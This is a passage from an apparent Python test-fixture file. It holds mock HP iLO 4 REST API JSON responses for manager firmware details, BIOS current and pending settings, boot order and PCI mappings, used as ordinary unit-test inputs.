"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_MANAGER_DETAILS_EQ_SUGGESTED = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 4,
"Time": "",
"VersionString": "iLO 4 v2.30"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_MANAGER_DETAILS_GT_SUGGESTED = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.54"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MajorVersion": 2,
"MinorVersion": 54,
"Time": "",
"VersionString": "iLO 4 v2.54"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_MANAGER_DETAILS_NO_FIRMWARE = """
{
"AvailableActions":
[
{
"Action": "Reset"
}
],
"CommandShell":
{
"ConnectTypesSupported":
[
"SSH",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 9
},
"Description": "Manager View",
"Firmware":
{
"Current":
{
"VersionString": "iLO 4 v2.20"
}
},
"GraphicalConsole":
{
"ConnectTypesSupported":
[
"KVMIP"
],
"Enabled": true,
"MaxConcurrentSessions": 10
},
"ManagerType": "BMC",
"Model": "iLO 4",
"Name": "Manager",
"Oem":
{
"Hp":
{
"AvailableActions":
[
{
"Action": "ResetRestApiState",
"Capabilities":
[
{
"AllowableValues":
[
"/Oem/Hp"
],
"PropertyName": "Target"
}
]
}
],
"FederationConfig":
{
"IPv6MulticastScope": "Site",
"MulticastAnnouncementInterval": 600,
"MulticastDiscovery": "Enabled",
"MulticastTimeToLive": 5,
"iLOFederationManagement": "Enabled"
},
"Firmware":
{
"Current":
{
"Date": "Feb 09 2015",
"DebugBuild": false,
"MinorVersion": 20,
"Time": "",
"VersionString": "iLO 4 v"
}
},
"License":
{
"LicenseKey": "32Q6W-PQWTB-H7XYL-39968-RR53R",
"LicenseString": "iLO 4 Advanced",
"LicenseType": "Perpetual"
},
"RequiredLoginForiLORBSU": false,
"SerialCLISpeed": 9600,
"SerialCLIStatus": "EnabledAuthReq",
"Type": "HpiLO.0.13.0",
"VSPLogDownloadEnabled": false,
"iLOSelfTestResults":
[
{
"Notes": "",
"SelfTestName": "NVRAMData",
"Status": "OK"
},
{
"Notes": "Controller firmware revision 2.09.00 ",
"SelfTestName": "EmbeddedFlash/SDCard",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "EEPROM",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "HostRom",
"Status": "OK"
},
{
"Notes": "",
"SelfTestName": "SupportedHost",
"Status": "OK"
},
{
"Notes": "ProLiant BL460c Gen9 System Programmable \
Logic Device version 0x13",
"SelfTestName": "CPLDPAL0",
"Status": "Informational"
},
{
"Notes": "ProLiant BL460c Gen9 SAS Programmable \
Logic Device version 0x01",
"SelfTestName": "CPLDPAL1",
"Status": "Informational"
}
],
"links":
{
"ActiveHealthSystem":
{
"href": "/rest/v1/Managers/1/ActiveHealthSystem"
},
"DateTimeService":
{
"href": "/rest/v1/Managers/1/DateTime"
},
"EmbeddedMediaService":
{
"href": "/rest/v1/Managers/1/EmbeddedMedia"
},
"FederationDispatch":
{
"extref": "/dispatch"
},
"FederationGroups":
{
"href": "/rest/v1/Managers/1/FederationGroups"
},
"FederationPeers":
{
"href": "/rest/v1/Managers/1/FederationPeers"
},
"LicenseService":
{
"href": "/rest/v1/Managers/1/LicenseService"
},
"UpdateService":
{
"href": "/rest/v1/Managers/1/UpdateService"
},
"VSPLogLocation":
{
"extref": "/sol.log.gz"
}
}
}
},
"SerialConsole":
{
"ConnectTypesSupported":
[
"SSH",
"IPMI",
"Oem"
],
"Enabled": true,
"MaxConcurrentSessions": 13
},
"Status":
{
"State": "Enabled"
},
"Type": "Manager.0.10.0",
"UUID": "83590768-e977-575a-927a-b3de8f692d4f",
"links":
{
"EthernetNICs":
{
"href": "/rest/v1/Managers/1/NICs"
},
"Logs":
{
"href": "/rest/v1/Managers/1/Logs"
},
"ManagerForServers":
[
{
"href": "/rest/v1/Systems/1"
}
],
"NetworkService":
{
"href": "/rest/v1/Managers/1/NetworkService"
},
"VirtualMedia":
{
"href": "/rest/v1/Managers/1/VirtualMedia"
},
"self":
{
"href": "/rest/v1/Managers/1"
}
}
}
"""
GET_BIOS_SETTINGS = """
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": null,
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AttributeRegistry": "HpBiosAttributeRegistryI36.1.0.40",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "This is the Platform/BIOS Configuration (RBSU)\
Current Settings",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSasEnable": "Enabled",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com2Irq3",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Com1Irq4",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "AllTargets",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"FlexLom1Enable": "Enabled",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelQpiFreq": "Auto",
"IntelQpiLinkEn": "Auto",
"IntelQpiPowerManagement": "Enabled",
"IntelTxt": "Disabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"Modified": "2015-03-13T21:50:42+00:00",
"Name": "BIOS Current Settings",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NicBoot5": "Disabled",
"NicBoot6": "Disabled",
"NicBoot7": "Disabled",
"NicBoot8": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"NvDimmNMemFunctionality": "Enabled",
"OldAdminPassword": null,
"OldPowerOnPassword": null,
"PciBusPadding": "Enabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": null,
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "DynamicPowerSavings",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"ProductId": "727021-B21",
"QpiBandwidthOpt": "Balanced",
"QpiSnoopConfig": "Standard",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"RomSelection": "CurrentRom",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"SerialNumber": "SGH449WNL3",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"SettingsResult":
{
"ETag": "5E0136E3",
"Messages":
[
{
"MessageArgs":
[
"Disable",
"TpmOperation"
],
"MessageID": "Base.1.0:PropertyValueTypeError"
},
{
"MessageArgs":
[
],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-03-09T17:50:09+00:00"
},
"Sriov": "Enabled",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeFormat": "Utc",
"TimeZone": "Unspecified",
"Tpm2Operation": "NoAction",
"Tpm2Visibility": "Visible",
"TpmBinding": "Disabled",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"TpmUefiOpromMeasuring": "Enabled",
"TpmVisibility": "Visible",
"Type": "HpBios.1.1.0",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VideoOptions": "BothVideoEnabled",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com1Irq4",
"WakeOnLan": "Disabled",
"links":
{
"BaseConfigs":
{
"href": "/rest/v1/systems/1/bios/BaseConfigs"
},
"Boot":
{
"href": "/rest/v1/systems/1/bios/Boot"
},
"Mappings":
{
"href": "/rest/v1/systems/1/bios/Mappings"
},
"Settings":
{
"href": "/rest/v1/systems/1/bios/Settings"
},
"iScsi":
{
"href": "/rest/v1/systems/1/bios/iScsi"
},
"self":
{
"href": "/rest/v1/systems/1/bios"
}
}
}
"""
GET_BIOS_PENDING_SETTINGS = """
{
"AcpiRootBridgePxm": "Enabled",
"AcpiSlit": "Enabled",
"AdjSecPrefetch": "Enabled",
"AdminEmail": "",
"AdminName": "",
"AdminOtherInfo": "",
"AdminPassword": null,
"AdminPhone": "",
"AdvancedMemProtection": "AdvancedEcc",
"AsrStatus": "Enabled",
"AsrTimeoutMinutes": "10",
"AssetTagProtection": "Unlocked",
"AutoPowerOn": "RestoreLastState",
"BootMode": "Uefi",
"BootOrderPolicy": "RetryIndefinitely",
"ChannelInterleaving": "Enabled",
"CollabPowerControl": "Enabled",
"ConsistentDevNaming": "LomsOnly",
"CustomPostMessage": "",
"DaylightSavingsTime": "Disabled",
"DcuIpPrefetcher": "Enabled",
"DcuStreamPrefetcher": "Enabled",
"Description": "This is the Platform/BIOS Configuration (RBSU) \
Pending Settings",
"Dhcpv4": "Enabled",
"DynamicPowerCapping": "Auto",
"DynamicPowerResponse": "Fast",
"EmbNicEnable": "Enabled",
"EmbSata1Enable": "Enabled",
"EmbSata2Enable": "Enabled",
"EmbVideoConnection": "Auto",
"EmbeddedDiagnostics": "Enabled",
"EmbeddedDiagsMode": "Auto",
"EmbeddedSata": "Ahci",
"EmbeddedSerialPort": "Com1Irq4",
"EmbeddedUefiShell": "Enabled",
"EmbeddedUserPartition": "Disabled",
"EmsConsole": "Disabled",
"EnergyPerfBias": "BalancedPerf",
"EraseUserDefaults": "No",
"ExtendedAmbientTemp": "Disabled",
"ExtendedMemTest": "Disabled",
"F11BootMenu": "Enabled",
"FCScanPolicy": "CardConfig",
"FanFailPolicy": "Shutdown",
"FanInstallReq": "EnableMessaging",
"HwPrefetcher": "Enabled",
"IntelDmiLinkFreq": "Auto",
"IntelNicDmaChannels": "Enabled",
"IntelPerfMonitoring": "Disabled",
"IntelProcVtd": "Enabled",
"IntelligentProvisioning": "Enabled",
"InternalSDCardSlot": "Enabled",
"IoNonPostedPrefetching": "Enabled",
"Ipv4Address": "0.0.0.0",
"Ipv4Gateway": "0.0.0.0",
"Ipv4PrimaryDNS": "0.0.0.0",
"Ipv4SecondaryDNS": "0.0.0.0",
"Ipv4SubnetMask": "0.0.0.0",
"Ipv6Duid": "Auto",
"MaxMemBusFreqMHz": "Auto",
"MaxPcieSpeed": "MaxSupported",
"MemFastTraining": "Enabled",
"MinProcIdlePkgState": "C6Retention",
"MinProcIdlePower": "C6",
"MixedPowerSupplyReporting": "Enabled",
"Modified": "2018-06-25T22:36:55+00:00",
"Name": "BIOS Pending Settings",
"NetworkBootRetry": "Enabled",
"NicBoot1": "NetworkBoot",
"NicBoot2": "Disabled",
"NicBoot3": "Disabled",
"NicBoot4": "Disabled",
"NmiDebugButton": "Enabled",
"NodeInterleaving": "Disabled",
"NumaGroupSizeOpt": "Clustered",
"OldAdminPassword": null,
"OldPowerOnPassword": null,
"PciBusPadding": "Enabled",
"PciSlot1Enable": "Enabled",
"PcieExpressEcrcSupport": "Disabled",
"PostF1Prompt": "Delayed20Sec",
"PowerButton": "Enabled",
"PowerOnDelay": "None",
"PowerOnLogo": "Enabled",
"PowerOnPassword": null,
"PowerProfile": "BalancedPowerPerf",
"PowerRegulator": "StaticHighPerf",
"PreBootNetwork": "Auto",
"ProcAes": "Enabled",
"ProcCoreDisable": 0,
"ProcNoExecute": "Enabled",
"ProcVirtualization": "Enabled",
"ProcX2Apic": "Enabled",
"ProductId": "719061-B21",
"QpiSnoopConfig": "Standard",
"RedundantPowerSupply": "BalancedMode",
"RemovableFlashBootSeq": "ExternalKeysFirst",
"RestoreDefaults": "No",
"RestoreManufacturingDefaults": "No",
"RomSelection": "CurrentRom",
"SataSecureErase": "Disabled",
"SaveUserDefaults": "No",
"SecureBootStatus": "Disabled",
"SerialConsoleBaudRate": "115200",
"SerialConsoleEmulation": "Vt100Plus",
"SerialConsolePort": "Auto",
"SerialNumber": "SGH449WW5B",
"ServerAssetTag": "",
"ServerName": "",
"ServerOtherInfo": "",
"ServerPrimaryOs": "",
"ServiceEmail": "",
"ServiceName": "",
"ServiceOtherInfo": "",
"ServicePhone": "",
"Slot1StorageBoot": "AllTargets",
"Sriov": "Enabled",
"ThermalConfig": "OptimalCooling",
"ThermalShutdown": "Enabled",
"TimeFormat": "Utc",
"TimeZone": "UtcP530",
"TpmState": "NotPresent",
"TpmType": "NoTpm",
"Type": "HpBios.1.2.0",
"UefiOptimizedBoot": "Enabled",
"UefiPxeBoot": "Auto",
"UefiShellBootOrder": "Disabled",
"UefiShellStartup": "Disabled",
"UefiShellStartupLocation": "Auto",
"UefiShellStartupUrl": "",
"UrlBootFile": "",
"Usb3Mode": "Auto",
"UsbBoot": "Enabled",
"UsbControl": "UsbEnabled",
"UtilityLang": "English",
"VirtualInstallDisk": "Disabled",
"VirtualSerialPort": "Com2Irq3",
"VlanControl": "Disabled",
"VlanId": 0,
"VlanPriority": 0,
"WakeOnLan": "Enabled",
"links":
{
"self":
{
"href": "/rest/v1/systems/1/bios/Settings"
}
}
}
"""
GET_BIOS_BOOT = """
{
"AttributeRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"BootSources": [
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:0)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)"
},
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:1)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x1)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv4(0.0.0.0)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 2-port\
361i Adapter - NIC (iSCSI IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x1)/IPv4(0.0.0.0)/iSCSI(iqn.2016-07.org.de\
:storage,0x1,0x0,None,None,None,TCP)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv6) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv6(0000:0000:0000:0000:0000:0000:0000:0000)"
},
{
"BootString": "Generic USB Boot",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"StructuredBootString": "Generic.USB.1.1",
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)",
"StructuredBootString": "CD.Virtual.2.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
}
],
"DefaultBootOrder": [
"Floppy",
"Cd",
"Usb",
"EmbeddedStorage",
"PcieSlotStorage",
"EmbeddedFlexLOM",
"PcieSlotNic",
"UefiShell"
],
"Description": "This is the Server Boot Order Current Settings",
"DesiredBootDevices": [
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
},
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
}
],
"Modified": "2015-05-26T23:38:24+00:00",
"Name": "Boot Order Current Settings",
"PersistentBootConfigOrder": [
"HD.Slot.1.1",
"HD.Slot.1.2",
"NIC.LOM.1.1.iSCSI",
"NIC.LOM.1.1.IPv4",
"NIC.LOM.1.1.IPv6",
"Generic.USB.1.1",
"CD.Virtual.2.1"
],
"SettingsResult": {
"ETag": "0DEA61A1609C51EED0628E3B0BC633DD",
"Messages": [
{
"MessageArgs": [
"PersistentBootConfigOrder[0"
],
"MessageID": "Base.1.0:PropertyValueNotInList"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-14T02:38:40+00:00"
},
"Type": "HpServerBootSettings.1.2.0",
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/Boot/BaseConfigs"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/Boot/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/Boot"
}
}
}
"""
GET_BIOS_MAPPINGS_WITHOUT_NIC = """
{
"Registry": "HpBiosAttributeRegistryP89.1.1.00",
"BiosPciSettingsMappings": [
{
"Associations": [
"EmbSata1Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1F,0x2)",
"Instance": 1,
"Subinstances": []
},
{
"Associations": [
"EmbNicEnable",
{
"PreBootNetwork": "EmbNic"
}
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"Instance": 3,
"Subinstances": []
}
]
}
"""
GET_BIOS_MAPPINGS = """
{
"Registry": "HpBiosAttributeRegistryP89.1.1.00",
"BiosPciSettingsMappings": [
{
"Associations": [
"EmbSata1Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1F,0x2)",
"Instance": 1,
"Subinstances": []
},
{
"Associations": [
"EmbSata2Enable"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x11,0x4)",
"Instance": 2,
"Subinstances": []
},
{
"Associations": [
"EmbNicEnable",
{
"PreBootNetwork": "EmbNic"
}
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"Instance": 3,
"Subinstances": [
{
"Associations": [
"NicBoot1"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"Subinstance": 1
},
{
"Associations": [
"NicBoot2"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x1)",
"Subinstance": 2
},
{
"Associations": [
"NicBoot3"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x2)",
"Subinstance": 3
},
{
"Associations": [
"NicBoot4"
],
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x3)",
"Subinstance": 4
